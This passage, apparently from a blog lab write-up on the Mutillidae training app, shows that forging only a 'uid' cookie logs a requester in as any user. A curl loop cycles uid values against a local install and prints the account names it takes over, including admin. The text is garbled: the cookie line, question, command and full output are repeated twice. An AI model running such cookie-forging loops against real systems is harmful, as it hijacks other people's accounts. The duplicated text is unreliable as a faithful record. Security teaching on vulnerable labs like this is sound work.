A successful login redirects back to the index page, with the following cookie:
uid=23; username=ed; PHPSESSID=<whatever>
Does just setting a uid in a cookie and then requesting the index page result in a login? Yes it does.
$ for uid in `seq 0 24`; do user=`curl -i -s -b "uid=${uid}" 'http://localhost/mutillidae/index.php' | grep Logged-In | cut -d ' ' -f2`; echo ${uid}, ${user}; done
0,
1, admin
2, adrian
3, john
4, jeremy
5, bryce
6, samurai
7, jim
8, bobby
9, simba
10, dreveil
11, scotty
12, cal
13, john
14, kevin
15, dave
16, patches
17, rocky
18, tim
19, ABaker
20, PPan
21, CHook
22, james
23, ed
uid=23; username=ed; PHPSESSID=<whatever>
Does just setting a uid in a cookie and then requesting the index page result in a login? Yes it does.
$ for uid in `seq 0 24`; do user=`curl -i -s -b "uid=${uid}" 'http://localhost/mutillidae/index.php' | grep Logged-In | cut -d ' ' -f2`; echo ${uid}, ${user}; done
0,
1, admin
2, adrian
3, john
4, jeremy
5, bryce
6, samurai
7, jim
8, bobby
9, simba
10, dreveil
11, scotty
12, cal
13, john
14, kevin
15, dave
16, patches
17, rocky
18, tim
19, ABaker
20, PPan
21, CHook
22, james
23, ed
No comments:
Post a Comment